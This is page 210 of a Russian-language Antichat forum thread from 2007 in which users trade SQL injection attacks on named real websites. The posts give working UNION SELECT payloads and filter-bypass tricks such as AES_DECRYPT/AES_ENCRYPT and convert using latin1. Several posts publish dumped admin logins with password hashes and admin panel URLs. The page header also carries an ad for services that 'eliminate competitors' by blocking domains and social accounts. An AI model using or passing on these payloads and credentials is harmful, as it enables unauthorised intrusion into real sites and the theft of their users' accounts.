Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 210 из 1242

210

Опции темы

Поиск в этой теме

Опции просмотра

#2091

30.04.2007, 10:48

-=lebed=-

Флудер

Регистрация: 21.06.2006

Сообщений: 3,193

Провел на форуме:
12702287

Репутация: 4738

Код:

http://www.alexavto.ru/catalog.php?id=-123+union+select+1,version(),3,4,5,user(),7,8,9,10,11,12,13/*

cont

#2092

30.04.2007, 12:32

~~Серенький~~

Banned

Регистрация: 13.04.2007

Сообщений: 123

Провел на форуме:
921520

Репутация: 572

cont

lebed
нашел там news,products,user_list

Цитата:

http://www.alexavto.ru/catalog.php?id=-3783+union+select+1,2,3,4,5,concat_ws(0x3a,user_id ,login,pwd,email,admin),7,8,9,0,1,2,3+from+user_li st+limit+0,1/*

#2093

30.04.2007, 13:10

-=lebed=-

Флудер

Регистрация: 21.06.2006

Сообщений: 3,193

Провел на форуме:
12702287

Репутация: 4738

Обход фильтрации через AES_DECRYPT(AES_ENCRYPT())

Код:

_http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+version()/* - так облом, а вот так:
_http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71)/* - нет облома  ;)

#2094

30.04.2007, 13:29

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

Цитата:

Сообщение от -=lebed=-

Обход фильтрации через AES_DECRYPT(AES_ENCRYPT())

Код:

_http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+version()/* - так облом, а вот так:
_http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71)/* - нет облома  ;)

какая еще фильтрация?

просто кодировки не сочетаются.

Цитата:

Query failed: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'

нужно просто convert(version()+using+latin1)/*

Код:

http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+convert(version()+using+latin1)/*

//с кем не бывает..

Последний раз редактировалось n1†R0x; 30.04.2007 в 13:37..

Уральский Государственный Экономический университет

#2095

30.04.2007, 13:40

_Pantera_

Участник форума

Регистрация: 06.10.2006

Сообщений: 226

Провел на форуме:
3025546

Репутация: 1327

Отправить сообщение для _Pantera_ с помощью ICQ

Уральский Государственный Экономический университет

http://www.usue.ru/general/professors/?id=-1+union+select+1,2,user_icq,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,concat(username,char(58),user_passwo rd)+from+www.phpbb_users+limit+1,1/*

slava:a6ad04d2d6f6d7cf072f27e46be45326

Всего зарегистрированных пользователей: 1368

#2096

30.04.2007, 14:07

cRiLaZ

Новичок

Регистрация: 17.10.2006

Сообщений: 23

Провел на форуме:
144373

Репутация: 104

http://news.ntv.ru/news/NewsPrint.jsp?nid=102499+order+by+56--

если кто дальше продолбит скиньте сюда или в личку плиз )

sql-inj

#2097

30.04.2007, 19:03

~~Серенький~~

Banned

Регистрация: 13.04.2007

Сообщений: 123

Провел на форуме:
921520

Репутация: 572

sql-inj

КВН - 1я украинская лига
Сайт: http://kvn.odessa.ua
уязвимость: http://kvn.odessa.ua/gallery.php?action=view&cat=11'
подобранные таблицы: userlist
подобранные поля: name,pass
2 организмa (админы сайта)

endorfine:6bdd7328ba8d625d540a4203311f5ec5
dimon:77963b7a931377ad4ab5ad6a9cd718aa:ddd

Цитата:

http://kvn.odessa.ua/gallery.php?action=view&cat=-11+union+select+1,aes_decrypt(aes_encrypt(concat_w s(0x3a,name,pass),0x55),0x55),3,4,5+from+userlist/*

админка :

Цитата:

http://kvn.odessa.ua/admin.php

#2098

30.04.2007, 19:50

Hawkins

Участник форума

Регистрация: 24.01.2007

Сообщений: 129

Провел на форуме:
932592

Репутация: 145

Отправить сообщение для Hawkins с помощью ICQ

http://www.logo.artperm.ru/script.php?litera=4'
В скуле не силён : )

#2099

30.04.2007, 20:13

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

Провел на форуме:
3536885

Репутация: 447

Цитата:

Сообщение от Hawkins

http://www.logo.artperm.ru/script.php?litera=4'
В скуле не силён : )

дальше сам уже

Код:

http://www.logo.artperm.ru/script.php?litera=4'+union+select+1,2,version(),4,5,6,7,8/*

sql-inj

#2100

30.04.2007, 20:41

~~Серенький~~

Banned

Регистрация: 13.04.2007

Сообщений: 123

Провел на форуме:
921520

Репутация: 572

sql-inj

Информационное агенство
Сайт: http://www.7info.ru
уязвимость: http://www.7info.ru/index.php?ns=127&id=61'
подобранные таблицы: user
подобранные поля: login,password,name
12 организмов
Admin:b842f0802c987156629ea4c87cca1259

Цитата:

http://www.7info.ru/index.php?ns=127&id=-61+union+select+1,concat_ws(0x3a,login,password,na me)+from+user/*

Админку не обнаружил.

Страница 210 из 1242

210

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход